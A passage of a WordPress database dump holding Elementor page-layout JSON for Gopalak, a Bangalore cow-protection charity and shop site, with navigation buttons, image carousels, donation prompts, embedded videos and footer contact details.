mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by\\u00a0<a href=\\\"https:\\/\\/themehunk.com\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Themehunk<\\/a><\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#020202\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12352,2024,'_elementor_page_assets','a:0:{}'),(12354,2025,'_elementor_edit_mode','builder'),(12355,2025,'_elementor_template_type','wp-page'),(12356,2025,'_elementor_version','3.7.8'),(12357,2025,'_wp_page_template','elementor_canvas'),(12358,2025,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 